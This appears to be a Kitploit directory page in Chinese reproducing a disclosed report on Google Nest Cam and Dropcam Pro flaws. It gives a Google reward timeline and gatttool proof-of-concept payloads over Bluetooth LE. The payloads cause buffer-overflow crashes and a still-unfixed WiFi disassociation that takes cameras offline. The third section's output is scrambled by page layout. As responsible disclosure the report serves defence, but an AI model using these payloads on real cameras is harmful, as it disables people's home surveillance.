Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Google-Nest-Cam-Bug-Disclosures — 面向消费级物联网摄像头的 PoC 漏洞披露,详述了可致设备离线的 BLE 缓冲区溢出与 WiFi 解除关联攻击。 | Kitploit
工具/GitHubGitHub/jasondoyle/google-nest-cam-bug-disclosures
嵌入式系统安全蓝牙安全漏洞分析漏洞利用无线安全硬件与物联网安全
GitHubjasondoyle/google-nest-cam-bug-disclosures

Google-Nest-Cam-Bug-Disclosures

面向消费级物联网摄像头的 PoC 漏洞披露,详述了可致设备离线的 BLE 缓冲区溢出与 WiFi 解除关联攻击。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
38549年前Kitploit 审核通过

Google-Nest-Cam-Bug-Disclosures

受影响设备:Dropcam Pro、Nest Cam 室内/室外机型
受影响的最新固件版本:205-600052
部分修复的固件版本:205-600055

更新 最新的固件版本 205-600055 并未修复 Dropcam Pro 中的 WiFi 断连(disassociation)漏洞。如果提供的 WiFi 网络不存在,重新关联时间已得到改进,现在大约 10 秒内即可重新连接。但是,仍然可以提供有效的 WiFi 网络,使 Dropcam 永久离线。

披露时间线:
2016 年 10 月 26 日:根据 Google 漏洞奖励计划(Vulnerability Reward Program)指南报告了该安全漏洞
2016 年 10 月 27 日:Google 安全团队确认已收到报告并正在调查
2016 年 11 月 1 日:Google 安全团队验证了所报告的漏洞并提交了 bug
2016 年 11 月 15 日:Google 的 VRP 评审小组以「非整合收购」类别发放了 100 美元奖励
2017 年 3 月 17 日:公开披露

由 Troy Stribling 开发的 PoC iOS 应用 :: NestPWN

通过 SSID 参数触发的基于蓝牙(BLE)的缓冲区溢出

已在所有机型中修复
  1. 概述
    在相机上设置 SSID 参数时,有可能触发缓冲区溢出条件。攻击者只需在相机通电状态下的任意时刻处于蓝牙范围内即可。即使初始设置完成后,蓝牙也从未被禁用。

  2. 概念验证
    anon@ubuntu:~/nest$ gatttool -b 18:B4:30:5D:00:B8 -t random -I
    [18:B4:30:5D:00:B8][LE]> connect
    Attempting to connect to 18:B4:30:5D:00:B8
    Connection successful
    [18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3a031201AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    [18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3b
    Characteristic value was written successfully
    Characteristic value was written successfully
    [18:B4:30:5D:00:B8][LE]>
    (gatttool:20352): GLib-WARNING **: Invalid file descriptor.

  3. 详细信息
    该载荷尝试设置一个长度为 1 字节的 SSID,并发送了 16 字节。
    SequenceNum=3a + Type=0312 + Length=01 + Value=AA*16

  4. 结果
    崩溃并重启,恢复正常运行状态

通过加密密码参数触发的基于蓝牙(BLE)的缓冲区溢出

已在所有机型中修复
  1. 概述
    在相机上设置加密密码参数时,有可能触发缓冲区溢出条件。攻击者只需在相机通电状态下的任意时刻处于蓝牙范围内即可。即使初始设置完成后,蓝牙也从未被禁用。

  2. 概念验证
    anon@ubuntu:~/nest$ gatttool -b 18:B4:30:5D:00:B8 -t random -I
    [18:B4:30:5D:00:B8][LE]> connect
    Attempting to connect to 18:B4:30:5D:00:B8
    Connection successful
    [18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3a03120b506574536d6172742d356e1a01AAAAAA
    [18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3b
    Characteristic value was written successfully
    Characteristic value was written successfully
    [18:B4:30:5D:00:B8][LE]>
    (gatttool:20352): GLib-WARNING **: Invalid file descriptor.

  3. 详细信息 该载荷尝试设置一个长度为 1 字节的加密 WiFi 密码,并发送了 3 字节。 SequenceNum=3a + Type=0312 + Length=0b + ssidVal=506574536d6172742d356e + type=1a + length=01 + encPass=AA*3

基于蓝牙(BLE)的 WiFi 断连

在 Dropcam Pro 中尚未修复
  1. 概述
    通过向相机提供一个要连接的新 SSID,可以使其断开与 WiFi 的连接。这些相机不支持本地存储视频录像,因此监控会被暂时禁用。攻击者只需在相机通电状态下的任意时刻处于蓝牙范围内即可。即使初始设置完成后,蓝牙也从未被禁用。

  2. 概念验证
    anon@ubuntu:~/nest$ gatttool -b 18:B4:30:5D:00:B8 -t random -I
    [18:B4:30:5D:00:B8][LE]> connect
    Attempting to connect to 18:B4:30:5D:00:B8
    Connection successful
    [18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3a03120b0a6574536d6172742d356e1a20232320
    [18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3becb824ba437c13233ac2ff78b1776456e47a01
    [18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3ca5787d2f5e53f394a512200228003210bc9253
    [18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3d48cada7a0d921d57b2d26ae89c3a04DEADBEEF
    [18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3e
    Characteristic value was written successfully

下载工具



  • 结果
    崩溃并重启,恢复正常运行状态


  • Characteristic value was written successfully

    Characteristic value was written successfully

    Characteristic value was written successfully

    Characteristic value was written successfully

    [18:B4:30:5D:00:B8][LE]>

  • 详细信息
    该载荷尝试更改 Nest Cam 关联的 SSID,导致其与当前 WiFi SSID 暂时断连。 seqNum + 0312(type) 0b(len) + SSID + 1a(type) 20(len) + encPass seqNum + encPass(cont) seqNum + encPass(cont) + 2002280032(constant) + 10(len) + authTag seqNum + authTag(cont) + 3a(UnknownType) 04(len) + DEADBEEF seqNum(execute)

  • 结果
    相机会断开与当前 WiFi 网络的连接,以尝试关联新设置的 SSID。如果该 WiFi 网络不存在,相机会离线约 60-90 秒,然后返回原始 WiFi 网络并恢复正常运行。如果该网络存在,它会检查 Internet 连接并保持在新网络上。